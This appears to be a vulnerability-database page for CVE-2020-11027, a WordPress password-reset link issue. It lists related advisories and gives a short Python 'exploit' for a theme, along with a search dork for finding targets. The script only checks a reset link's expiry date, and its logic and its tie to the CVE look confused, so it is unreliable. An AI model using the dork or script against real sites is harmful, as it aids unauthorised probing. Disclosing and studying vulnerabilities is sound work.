| Reporter | Title | Published | Views | Family All 68 |
|---|---|---|---|---|
| WordPress Medic Theme v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password Exploit | 19 Jun 202300:00 | – | zdt | |
| WordPress Access Restriction Bypass Vulnerability (CNVD-2020-27079) | 7 May 202000:00 | – | cnvd | |
| CVE-2020-11027 | 30 Apr 202000:00 | – | cve | |
| CVE-2020-11027 Password reset links invalidation issue in WordPress | 30 Apr 202000:00 | – | cvelist | |
| [SECURITY] [DLA 2208-1] wordpress security update | 11 May 202013:43 | – | debian | |
| [SECURITY] [DSA 4677-1] wordpress security update | 6 May 202006:30 | – | debian | |
| [SECURITY] [DSA 4677-1] wordpress security update | 6 May 202006:30 | – | debian | |
| CVE-2020-11027 | 30 Apr 202000:00 | – | debiancve | |
| Debian DLA-2208-1 : wordpress security update | 12 May 202000:00 | – | nessus | |
| Debian DSA-4677-1 : wordpress - security update | 7 May 202000:00 | – | nessus |
`# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
# Dork: inurl:/wp-includes/class-wp-query.php
# Date: 2023-06-19
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
# Version: 1.0.0 (REQUIRED)
# Tested on: Windows/Linux
# CVE: CVE-2020-11027
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
# Set the WordPress site URL and the user email address
site_url = 'https://example.com'
user_email = '[email protected]'
# Get the password reset link from the user email
# You can use any email client or library to retrieve the email
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
with open('password_reset_email.html', 'r') as f:
email = f.read()
soup = BeautifulSoup(email, 'html.parser')
reset_link = soup.find('a', href=True)['href']
print(f'Reset Link: {reset_link}')
# Check if the password reset link expires upon changing the user password
response = requests.get(reset_link)
if response.status_code == 200:
# Get the expiration date from the reset link HTML
soup = BeautifulSoup(response.text, 'html.parser')
expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
print(f'Expiration Date: {expiration_date}')
# Check if the expiration date is less than 24 hours from now
if expiration_date < datetime.now() + timedelta(hours=24):
print('Password reset link expires upon changing the user password.')
else:
print('Password reset link does not expire upon changing the user password.')
else:
print(f'Error fetching reset link: {response.status_code} {response.text}')
exit()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation